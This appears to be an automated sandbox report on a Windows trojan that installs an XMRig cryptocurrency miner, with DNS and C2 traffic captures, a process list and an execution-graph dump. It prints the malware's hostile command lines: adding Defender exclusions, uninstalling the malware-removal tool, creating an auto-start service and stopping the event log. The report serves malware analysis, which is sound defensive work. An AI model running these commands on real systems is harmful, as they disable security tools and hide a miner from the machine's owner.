                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 5, 2024 16:25:06.413438082 CEST192.168.2.51.1.1.10x59e2Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 5, 2024 16:25:06.421236038 CEST1.1.1.1192.168.2.50x59e2No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 5, 2024 16:25:06.421236038 CEST1.1.1.1192.168.2.50x59e2No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                      Sep 5, 2024 16:25:06.421236038 CEST1.1.1.1192.168.2.50x59e2No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                      Sep 5, 2024 16:25:06.421236038 CEST1.1.1.1192.168.2.50x59e2No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                      • 195.10.205.253
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549705195.10.205.253803920C:\Windows\System32\svchost.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 5, 2024 16:25:07.524826050 CEST180OUTPOST /panel/api/endpoint.php HTTP/1.1
                                                      Accept: */*
                                                      Connection: close
                                                      Content-Length: 482
                                                      Content-Type: application/json
                                                      Host: 195.10.205.253
                                                      User-Agent: cpp-httplib/0.12.6
                                                      Sep 5, 2024 16:25:07.530529022 CEST482OUTData Raw: 7b 22 69 64 22 3a 22 6d 63 71 71 61 6a 75 6f 69 62 6c 68 6e 7a 75 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 32 36 35 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 46 56 39 54 54
                                                      Data Ascii: {"id":"mcqqajuoiblhnzuh","computername":"226533","username":"SYSTEM","gpu":"YFV9TT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                                      Sep 5, 2024 16:25:08.180952072 CEST267INHTTP/1.1 200 OK
                                                      Date: Thu, 05 Sep 2024 14:25:08 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                      X-Robots-Tag: noindex, nofollow
                                                      X-Powered-By: PHP/8.2.12
                                                      Content-Length: 17
                                                      Connection: close
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d
                                                      Data Ascii: {"response":"ok"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549715195.10.205.253803920C:\Windows\System32\svchost.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 5, 2024 16:26:06.441839933 CEST180OUTPOST /panel/api/endpoint.php HTTP/1.1
                                                      Accept: */*
                                                      Connection: close
                                                      Content-Length: 497
                                                      Content-Type: application/json
                                                      Host: 195.10.205.253
                                                      User-Agent: cpp-httplib/0.12.6
                                                      Sep 5, 2024 16:26:06.446628094 CEST497OUTData Raw: 7b 22 69 64 22 3a 22 6d 63 71 71 61 6a 75 6f 69 62 6c 68 6e 7a 75 68 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 32 36 35 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 59 46 56 39 54 54
                                                      Data Ascii: {"id":"mcqqajuoiblhnzuh","computername":"226533","username":"SYSTEM","gpu":"YFV9TT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","
                                                      Sep 5, 2024 16:26:07.212920904 CEST251INHTTP/1.1 200 OK
                                                      Date: Thu, 05 Sep 2024 14:26:06 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                      X-Robots-Tag: noindex, nofollow
                                                      X-Powered-By: PHP/8.2.12
                                                      Content-Length: 2
                                                      Connection: close
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 7b 7d
                                                      Data Ascii: {}


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:10:24:58
                                                      Start date:05/09/2024
                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe"
                                                      Imagebase:0x7ff7ca380000
                                                      File size:2'625'536 bytes
                                                      MD5 hash:6424419AC4C6F0A24C95233E527C1E8A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:10:24:58
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:10:24:58
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff632c80000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "PHVUTTIO"
                                                      Imagebase:0x7ff7e8910000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff71fe40000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto"
                                                      Imagebase:0x7ff7e8910000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff7e8910000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "PHVUTTIO"
                                                      Imagebase:0x7ff7e8910000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\ProgramData\utblsmnncewd\bbecxurdegum.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\utblsmnncewd\bbecxurdegum.exe
                                                      Imagebase:0x7ff7794e0000
                                                      File size:2'625'536 bytes
                                                      MD5 hash:6424419AC4C6F0A24C95233E527C1E8A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 76%, ReversingLabs
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:10:25:02
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:10:25:05
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff632c80000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:10:25:05
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Target ID:21
                                                      Start time:10:25:05
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:10:25:05
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff71fe40000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:10:25:05
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:svchost.exe
                                                      Imagebase:0x7ff7e52b0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                      Has exited:false

                                                      Target ID:26
                                                      Start time:10:25:40
                                                      Start date:05/09/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                      Imagebase:0x7ff7e52b0000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:10.6%
                                                        Total number of Nodes:1675
                                                        Total number of Limit Nodes:2
                                                        execution_graph 4468 7ff7ca38219e 4469 7ff7ca3821ab EnterCriticalSection 4468->4469 4470 7ff7ca382272 4468->4470 4471 7ff7ca382265 LeaveCriticalSection 4469->4471 4473 7ff7ca3821c8 4469->4473 4471->4470 4472 7ff7ca3821e9 TlsGetValue GetLastError 4472->4473 4473->4471 4473->4472 4415 7ff7ca381e65 4416 7ff7ca381e67 signal 4415->4416 4417 7ff7ca381e7c 4416->4417 4418 7ff7ca381e99 4416->4418 4417->4418 4419 7ff7ca381e82 signal 4417->4419 4419->4418 4439 7ff7ca382104 4440 7ff7ca382111 EnterCriticalSection 4439->4440 4441 7ff7ca382218 4439->4441 4443 7ff7ca38220b LeaveCriticalSection 4440->4443 4447 7ff7ca38212e 4440->4447 4442 7ff7ca382272 4441->4442 4444 7ff7ca382241 DeleteCriticalSection 4441->4444 4446 7ff7ca382230 free 4441->4446 4443->4441 4444->4442 4445 7ff7ca38214d TlsGetValue GetLastError 4445->4447 4446->4444 4446->4446 4447->4443 4447->4445 4484 7ff7ca381ac3 4485 7ff7ca381a70 4484->4485 4486 7ff7ca381b36 4485->4486 4487 7ff7ca381b53 4485->4487 4490 7ff7ca38199e 4485->4490 4489 7ff7ca381ba0 4 API calls 4486->4489 4488 7ff7ca381a0f 4489->4487 4490->4488 4491 7ff7ca3819e9 VirtualProtect 4490->4491 4491->4490 2770 7ff7ca381140 2773 7ff7ca381160 2770->2773 2772 7ff7ca381156 2774 7ff7ca38118b 2773->2774 2775 7ff7ca3811b9 2773->2775 2774->2775 2776 7ff7ca381190 2774->2776 2777 7ff7ca3811c7 _amsg_exit 2775->2777 2778 7ff7ca3811d3 2775->2778 2776->2775 2779 7ff7ca3811a0 Sleep 2776->2779 2777->2778 2780 7ff7ca38121a 2778->2780 2781 7ff7ca381201 _initterm 2778->2781 2779->2775 2779->2776 2798 7ff7ca381880 2780->2798 2781->2780 2784 7ff7ca38126a 2785 7ff7ca38126f malloc 2784->2785 2786 7ff7ca38128b 2785->2786 2789 7ff7ca3812d2 2785->2789 2787 7ff7ca3812a0 strlen malloc memcpy 2786->2787 2787->2787 2788 7ff7ca3812d0 2787->2788 2788->2789 2811 7ff7ca383b50 2789->2811 2791 7ff7ca381315 2792 7ff7ca381324 2791->2792 2795 7ff7ca381344 2791->2795 2793 7ff7ca38132d _cexit 2792->2793 2794 7ff7ca381338 2792->2794 2793->2794 2794->2772 2796 7ff7ca381160 91 API calls 2795->2796 2797 7ff7ca381366 2796->2797 2797->2772 2799 7ff7ca381247 SetUnhandledExceptionFilter 2798->2799 2800 7ff7ca3818a2 2798->2800 2799->2784 2800->2799 2801 7ff7ca38194d 2800->2801 2806 7ff7ca381a20 2800->2806 2802 7ff7ca38199e 2801->2802 2803 7ff7ca381956 2801->2803 2802->2799 2805 7ff7ca3819e9 VirtualProtect 2802->2805 2803->2802 2978 7ff7ca381ba0 2803->2978 2805->2802 2806->2802 2807 7ff7ca381b5c 2806->2807 2808 7ff7ca381b36 2806->2808 2809 7ff7ca381ba0 4 API calls 2808->2809 2810 7ff7ca381b53 2809->2810 2810->2807 2813 7ff7ca383b66 2811->2813 2812 7ff7ca383c60 wcslen 2988 7ff7ca38153f 2812->2988 2813->2812 2818 7ff7ca383d60 2821 7ff7ca383d7a memset wcscat memset 2818->2821 2823 7ff7ca383dd3 2821->2823 2824 7ff7ca383e23 wcslen 2823->2824 2825 7ff7ca383e35 2824->2825 2829 7ff7ca383e7c 2824->2829 2826 7ff7ca383e50 _wcsnicmp 2825->2826 2827 7ff7ca383e66 wcslen 2826->2827 2826->2829 2827->2826 2827->2829 2828 7ff7ca383edd wcscpy wcscat memset 2830 7ff7ca383f1c 2828->2830 2829->2828 2831 7ff7ca384024 wcscpy wcscat 2830->2831 2832 7ff7ca38404f memset 2831->2832 2836 7ff7ca384131 2831->2836 2833 7ff7ca384070 2832->2833 2834 7ff7ca3840d5 wcslen 2833->2834 2835 7ff7ca3840eb 2834->2835 2843 7ff7ca38412c 2834->2843 2838 7ff7ca384100 _wcsnicmp 2835->2838 3172 7ff7ca382df0 2836->3172 2839 7ff7ca384116 wcslen 2838->2839 2838->2843 2839->2838 2839->2843 2840 7ff7ca3843a3 wcscpy wcscat _wcsicmp 2841 7ff7ca3843d7 2840->2841 2842 7ff7ca3843f0 memset 2840->2842 3184 7ff7ca3814d6 2841->3184 2845 7ff7ca384411 2842->2845 2843->2840 2846 7ff7ca384456 wcscpy wcscat memset 2845->2846 2848 7ff7ca38449c 2846->2848 2847 7ff7ca384501 wcscpy wcscat memset 2849 7ff7ca384547 2847->2849 2848->2847 2850 7ff7ca384577 wcscpy wcscat 2849->2850 2851 7ff7ca3861a1 memcpy 2850->2851 2852 7ff7ca3845a9 2850->2852 2851->2852 2853 7ff7ca382df0 11 API calls 2852->2853 2855 7ff7ca384758 2853->2855 2854 7ff7ca382df0 11 API calls 2856 7ff7ca38486c memset 2854->2856 2855->2854 2858 7ff7ca38488d 2856->2858 2857 7ff7ca3848d0 wcscpy wcscat memset 2860 7ff7ca384919 2857->2860 2858->2857 2859 7ff7ca38495c wcscpy wcscat wcslen 3239 7ff7ca38146d 2859->3239 2860->2859 2863 7ff7ca384a6d 2866 7ff7ca384b63 wcslen 2863->2866 2872 7ff7ca384d35 2863->2872 3411 7ff7ca38157b 2866->3411 2867 7ff7ca38145e 2 API calls 2867->2863 2871 7ff7ca384cc8 wcslen 3449 7ff7ca3815e4 2871->3449 2873 7ff7ca384e76 wcslen 2872->2873 2876 7ff7ca38157b 2 API calls 2873->2876 2875 7ff7ca384c22 2875->2871 2875->2872 2878 7ff7ca384f00 2876->2878 2880 7ff7ca384f08 memset 2878->2880 2883 7ff7ca38501a 2878->2883 2879 7ff7ca38145e 2 API calls 2879->2872 2882 7ff7ca384f29 2880->2882 2881 7ff7ca384f79 wcslen 3452 7ff7ca3815a8 2881->3452 2882->2881 2885 7ff7ca382df0 11 API calls 2883->2885 2893 7ff7ca3851b7 _wcsicmp 2883->2893 2890 7ff7ca3850c5 2885->2890 2887 7ff7ca38500e 2889 7ff7ca38145e 2 API calls 2887->2889 2888 7ff7ca384fe9 _wcsnicmp 2888->2887 2896 7ff7ca3857f1 2888->2896 2889->2883 2891 7ff7ca382df0 11 API calls 2890->2891 2891->2893 2892 7ff7ca38584e wcslen 2895 7ff7ca3815a8 2 API calls 2892->2895 2894 7ff7ca3851d2 memset 2893->2894 2908 7ff7ca385555 2893->2908 2899 7ff7ca3851f6 2894->2899 2897 7ff7ca3858aa 2895->2897 2896->2892 2900 7ff7ca38145e 2 API calls 2897->2900 2898 7ff7ca38523b wcscpy wcscat wcslen 2902 7ff7ca38146d 2 API calls 2898->2902 2899->2898 2900->2883 2901 7ff7ca385609 wcslen 2903 7ff7ca38153f 2 API calls 2901->2903 2904 7ff7ca385308 2902->2904 2905 7ff7ca385694 2903->2905 3463 7ff7ca381530 2904->3463 2907 7ff7ca38145e 2 API calls 2905->2907 2910 7ff7ca3856a5 2907->2910 2908->2901 2920 7ff7ca38573c 2910->2920 3721 7ff7ca382f70 2910->3721 2911 7ff7ca385346 3502 7ff7ca3814a9 2911->3502 2912 7ff7ca386852 2914 7ff7ca38145e 2 API calls 2912->2914 2917 7ff7ca38685e 2914->2917 2915 7ff7ca385799 wcslen 2919 7ff7ca3857af 2915->2919 2944 7ff7ca3857ec 2915->2944 2917->2791 2925 7ff7ca3857c0 _wcsnicmp 2919->2925 2920->2915 2921 7ff7ca3853e2 2924 7ff7ca38145e 2 API calls 2921->2924 2922 7ff7ca3856d2 3725 7ff7ca3838e0 2922->3725 2937 7ff7ca3853d6 2924->2937 2928 7ff7ca3857d6 wcslen 2925->2928 2925->2944 2928->2925 2928->2944 2930 7ff7ca3814c7 2 API calls 2934 7ff7ca38572e 2930->2934 2931 7ff7ca385959 memset wcscpy wcscat 2936 7ff7ca382f70 2 API calls 2931->2936 2932 7ff7ca3853ca 2933 7ff7ca38145e 2 API calls 2932->2933 2933->2937 2934->2920 2941 7ff7ca38145e 2 API calls 2934->2941 2939 7ff7ca3859b0 2936->2939 3648 7ff7ca383350 memset 2937->3648 2940 7ff7ca383350 11 API calls 2939->2940 2943 7ff7ca3859c8 2940->2943 2941->2920 2945 7ff7ca3814c7 2 API calls 2943->2945 2944->2931 2946 7ff7ca3859f6 memset 2945->2946 2949 7ff7ca385a17 2946->2949 2947 7ff7ca385431 2948 7ff7ca382df0 11 API calls 2947->2948 2957 7ff7ca3854ba 2948->2957 2950 7ff7ca385a67 wcslen 2949->2950 2951 7ff7ca385ab7 wcscat memset 2950->2951 2952 7ff7ca385a79 2950->2952 2959 7ff7ca385af1 2951->2959 2953 7ff7ca385a90 _wcsnicmp 2952->2953 2953->2951 2956 7ff7ca385aa2 wcslen 2953->2956 2955 7ff7ca382df0 11 API calls 2958 7ff7ca384234 2955->2958 2956->2951 2956->2953 2957->2955 2958->2791 2960 7ff7ca385b54 wcscpy wcscat 2959->2960 2961 7ff7ca385b89 2960->2961 2962 7ff7ca3867c6 memcpy 2961->2962 2963 7ff7ca385cb1 2961->2963 2962->2963 2964 7ff7ca385d6f wcslen 2963->2964 2965 7ff7ca38153f 2 API calls 2964->2965 2966 7ff7ca385dfa 2965->2966 2967 7ff7ca38145e 2 API calls 2966->2967 2968 7ff7ca385e0b 2967->2968 2969 7ff7ca385ea3 2968->2969 2971 7ff7ca382f70 2 API calls 2968->2971 2970 7ff7ca38145e 2 API calls 2969->2970 2970->2958 2972 7ff7ca385e38 2971->2972 2973 7ff7ca3838e0 11 API calls 2972->2973 2974 7ff7ca385e5d 2973->2974 2975 7ff7ca3814c7 2 API calls 2974->2975 2976 7ff7ca385e95 2975->2976 2976->2969 2977 7ff7ca38145e 2 API calls 2976->2977 2977->2969 2981 7ff7ca381bc2 2978->2981 2979 7ff7ca381c04 memcpy 2979->2803 2981->2979 2982 7ff7ca381c45 VirtualQuery 2981->2982 2983 7ff7ca381cf4 2981->2983 2982->2983 2987 7ff7ca381c72 2982->2987 2984 7ff7ca381d23 GetLastError 2983->2984 2985 7ff7ca381d37 2984->2985 2986 7ff7ca381ca4 VirtualProtect 2986->2979 2986->2984 2987->2979 2987->2986 3748 7ff7ca381394 2988->3748 2990 7ff7ca38154e 2991 7ff7ca381394 2 API calls 2990->2991 2992 7ff7ca381558 2991->2992 2993 7ff7ca38155d 2992->2993 2994 7ff7ca381394 2 API calls 2992->2994 2995 7ff7ca381394 2 API calls 2993->2995 2994->2993 2996 7ff7ca381567 2995->2996 2997 7ff7ca38156c 2996->2997 2998 7ff7ca381394 2 API calls 2996->2998 2999 7ff7ca381394 2 API calls 2997->2999 2998->2997 3000 7ff7ca381576 2999->3000 3001 7ff7ca38157b 3000->3001 3002 7ff7ca381394 2 API calls 3000->3002 3003 7ff7ca381394 2 API calls 3001->3003 3002->3001 3004 7ff7ca381585 3003->3004 3005 7ff7ca38158a 3004->3005 3006 7ff7ca381394 2 API calls 3004->3006 3007 7ff7ca381394 2 API calls 3005->3007 3006->3005 3008 7ff7ca381599 3007->3008 3009 7ff7ca381394 2 API calls 3008->3009 3010 7ff7ca3815a3 3009->3010 3011 7ff7ca381394 2 API calls 3010->3011 3012 7ff7ca3815a8 3011->3012 3013 7ff7ca381394 2 API calls 3012->3013 3014 7ff7ca3815b7 3013->3014 3015 7ff7ca381394 2 API calls 3014->3015 3016 7ff7ca3815c6 3015->3016 3017 7ff7ca381394 2 API calls 3016->3017 3018 7ff7ca3815d5 3017->3018 3019 7ff7ca3815e4 3018->3019 3020 7ff7ca381394 2 API calls 3018->3020 3021 7ff7ca381394 2 API calls 3019->3021 3020->3019 3022 7ff7ca3815f3 3021->3022 3022->2958 3023 7ff7ca381503 3022->3023 3024 7ff7ca381394 2 API calls 3023->3024 3025 7ff7ca381512 3024->3025 3026 7ff7ca381394 2 API calls 3025->3026 3027 7ff7ca381521 3026->3027 3028 7ff7ca381530 3027->3028 3029 7ff7ca381394 2 API calls 3027->3029 3030 7ff7ca381394 2 API calls 3028->3030 3029->3028 3031 7ff7ca38153a 3030->3031 3032 7ff7ca38153f 3031->3032 3033 7ff7ca381394 2 API calls 3031->3033 3034 7ff7ca381394 2 API calls 3032->3034 3033->3032 3035 7ff7ca38154e 3034->3035 3036 7ff7ca381394 